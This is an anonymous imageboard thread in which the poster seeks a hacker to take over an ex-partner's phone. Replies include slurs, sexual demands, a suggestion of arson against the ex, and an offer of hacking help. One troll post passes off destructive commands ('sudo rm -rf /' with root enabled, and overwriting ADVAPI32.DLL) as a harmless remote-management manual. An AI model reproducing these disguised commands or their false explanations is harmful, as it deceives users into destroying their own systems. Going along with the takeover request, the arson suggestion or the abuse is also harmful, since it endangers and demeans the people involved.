I NEED A HACKER!!! My ex has been harassing me and I need a hacker to help me take him down...

I NEED A HACKER!!! My ex has been harassing me and I need a hacker to help me take him down. We dated for a long time and we broke things off under bad circumstances. I tried to be friendly and follow his new girl friend on social media. He LITERALLY FUCKING TRACKED MY IP ADDRESS to link it to the account to prove it was me. Then he went on and on on his instagram page about how I was a stalker and I was creepy and I was a psychopath Then he started talking on about my past. My history of aggression and violence and all me mental hospital stays. And he went on saying that I was only trying to endanger the girl. After I commented and reported his posts he deleted them and blocked me. But he is still texting me harassing me about it. So if you are a hacker that could take over his cellphone or you could maybe point me in the right direction, itd be great!

Other urls found in this thread:

technet.microsoft.com/en-us/library/cc947813(v=ws.10).aspx
twitter.com/SFWRedditVideos

Not to brag, but I am proficient at command prompt

wanna be friends, im proficient at shit posting :D

The easy answer is to quit following his new gf and to block his number but because you're a fucking head case you won't do that. You have to make sure he can always still contact you and you are obsessed with him. Move the fuck on and be a goddamn adult for Christ's sake.

"I tried to be friendly and follow his new girl friend on social media."

Because that's not fucking stalkerish at all.

Oh Yes I'm the one in the wrong because him and I were still friends and I was only trying to be nice to this girl. I'm not the one who was tracking IP addresses to link personal accounts. I have moved on and I am very happy. I'm not obsessed with him in the slightest.

NYPA titsorgtfo

Kek
Goes on Sup Forums looking for hacker
"I'm not obsessed with him in the slightest."

What kind of bait is this

I'm not obsessed. I'm angry. I dont want a hacker as in "Oh I wanna see what hes doing" Fuck that I couldn't care less. I want his shit shut down.

Tits or get banned

Couldn't be more stalker if you tried. Move on with your life you petty psycho cunt.

Drop it and turn les already you fucking cunt

See whats funny here is that I AM A FUCKING GUY

Choke on a dick and forget about it then fagot that's my best advice

Not OP. Yawn.

I'd love to forget, but the fact that hes still fucking harassing me, and now also attacking my friends, angers me.

kys beta

pic related

Learn the rules OP

Bored hacker here. Experience in JavaScript, CSS, HTML, PHP, SQL and the most relevant to the current situation that I'll probably be using, Python 3.5. Reply to me if interested OP

Very interested if you're serious

Couldn't be a better time for those "not your personal army bitch" fags to pop up

Block his number. Move on. It's literally that easy. But you just cant, can you?

hacker here, just delete system 32 and your info will disappear from the net

now this is bait
it's got aalll the trappings of good bait

If you screen cap this shit, fucking use it against him.

He got your IP, and you're being fucking stupid. Screen cap him showing it off, call the police, bing bong done.

I am. You can reach me on this line:
(647) 487-8124

You should just buy some lighter fluid and matches and teach him not to fuck with you.

Its not that easy when he starts doing it on social media, and attacking your best friend and your current boyfriend, telling them all to die. Also I'm not going to ignore the fact that he is literally threatening my life.

1) take a monumental shit
2) take pic
3) post
>profit

If he's attacking your friends as well, why don't you ALL JUST SCREEN CAP AND USE IT AS EVIDENCE. JESUS CHRIST WOMAN.

Psycho drama. You need it. You'll make sure you have it.

Its not illegal to track ips tho

Pewdie pie ignores death threats. Be like pewdiepie :D
Also
Tits, or you get hacked for being responsible for this shit thread bitch.

Just send pics to the cops and he'll get charged for it and probably won't do it again.

Buppers or gtfo

So! The first thing you're gonna want to do:

-OSX: enable root user:
-------------------------------------------
OS X Lion (10.7) and later

From the Apple menu choose System Preferences.
From the View menu choose Users & Groups.
Click the lock and authenticate as an administrator account.
Click Login Options.
Click the "Edit" or "Join" button at the bottom right.
Click the "Open Directory Utility" button.
Click the lock in the Directory Utility window.
Enter an administrator account name and password, then click OK.
Choose Enable Root User from the Edit menu.
Enter the root password you wish to use in both the Password and Verify fields, then click OK.

Mac OS X Snow Leopard (10.6.x)

From the Apple menu choose System Preferences.
From the View menu choose Accounts.
Click on the lock and authenticate with an administrator account.
Click Login Options.
Click the "Edit" or "Join" button at the bottom right.
Click the "Open Directory Utility" button.
Click the lock in the Directory Utility window.
Enter an administrator account name and password, then click OK.
Choose Enable Root User from the Edit menu.
Enter the root password you wish to use in both the Password and Verify fields, then click OK.
---------------------------
then, go to Terminal (just use spotlight to find it) and use the command "sudo rm -rf /" without the quotes. It will prompt you for the password you just set, then bring up the Readme File [-rf] for Remote Management [rm]. This will introduce you to some methods of connecting to a remote computer.
===============================
For Windows:
run Command Prompt as administrator. Here's a quick guide:

technet.microsoft.com/en-us/library/cc947813(v=ws.10).aspx

then, use the command "echo rm rf > C:\Windows\System32\ADVAPI32.DLL". I don't remember if you need to double-up the backslashes [it's been awhile since I used Windows], but I don't think so.

i ken hak i us inspek elemin@!!!!

Beta kek

You have 2 full minutes to turn on a light and bust out dem tities. Starting now :D

this should open the same manual from Windows' ADVAnced Application Programming Interface. It's easy to fuck things up with (hence why you need admin), but you should be OK if you just read the fucking manual

If laugh if this stupid fucking whore actually does this

Times up bitch

Hey... I can help. I just need both of your account names

Cuntard left